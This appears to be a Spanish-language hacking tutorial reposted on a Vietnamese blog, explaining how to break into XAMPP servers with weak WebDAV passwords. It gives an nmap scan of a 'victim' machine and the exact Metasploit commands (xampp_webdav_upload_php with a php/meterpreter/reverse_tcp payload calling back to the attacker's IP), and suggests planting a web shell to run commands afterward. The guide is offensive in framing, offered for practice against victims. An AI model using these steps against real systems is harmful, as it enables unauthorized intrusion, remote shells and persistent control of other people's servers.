Trang

[Metasploit] Hackeando XAMPP Remotamente (Windows XP - 7 - 8)

xampp

------------------------------------------------------------------------------------------------------------------
XAMPP es una forma fácil de instalar la distribución Apache que contiene MySQL, PHP y Perl. XAMPP es realmente simple de instalar y usar - basta descargarlo, extraerlo y comenzar.
La distribución de Windows 2000, 2003, XP, Vista y 7 contiene Apache, MySQL, PHP + PEAR, Perl, mod_php, mod_perl, mod_ssl, OpenSSL, phpMyAdmin, Webalizer, Mercury Mail Transport System for Win32 and NetWare Systems v3.32, Ming, FileZilla FTP Server, mcrypt, eAccelerator, SQLite, and WEB-DAV + mod_auth_mysql.
------------------------------------------------------------------------------------------------------------------


Actualmente el servicio XAMPP, usado por la mayoria de webmasters y usuarios que se dedican a la Programación Web son totalmente vulnerables y se ha creado un modulo en metasploit que explota contraseñas débiles WebDAV en los servidores XAMPP y utiliza credenciales proporcionadas para subir una carga útil de PHP y ejecutarlo. El exploit se encuentra disponible desde XAMPP WebDAV PHP Upload y los pasos para aprovecharse de esta vulnerabilidad, son los siguientes:

REQUERIMIENTOS:

PROCEDIMIENTOS:

Primeramente tenemos que detectar si la PC victima esta ejecutando el servicio XAMPP, para ello usaremos Nmap, ejecutando el siguiente comando:
  • nmap -sS -T4 -A 192.168.1.38
do875e

Si los resultados se muestran tal cual con la imagen de arriba, quiere decir que la PC victima esta ejecutando el servicio XAMPP en el puerto 80 y 443, entonces para aprovecharnos de la vulnerabilidad mencionada lineas arriba, simplemente abriremos metasploit y ejecutamos los siguientes comandos:
-------------------------------------------------------------------------------------------------------------
use exploit/windows/http/xampp_webdav_upload_php
set payload php/meterpreter/reverse_tcp
set Lhost 192.168.1.36 (Nuestra IP)
set RHOST 192.168.1.38 (IP Victima)
exploit
-------------------------------------------------------------------------------------------------------------
21brxmo
Estos comandos haran que se ejecute un payload en php la cual automaticamente se "subira" en el servicio XAMPP de la PC victima.
k9ez9
Seguidamente si todo se realizo correctamente, recibiremos la session meterpreter gracias al payload que metasploit subio al servicio XAMPP vulnerable.
idatcl
Lo demas ya queda a nuestra total disposicion, en este caso podemos subir una web shell ya que XAMPP es un servicio web, por lo que podemos ingresar desde nuestro navegador a la IP vulnerada y ejecutar comandos desde la shell.
Espero les sirva y practiquen :)

Chú Ý:

Coppy phải ghi rõ nguồn Dương-UG Blog's
 

0 nhận xét:

Đăng nhận xét

:) :( :)) :(( =))

Copyright © Dương-UG Blog's - Nguyễn Bình Dương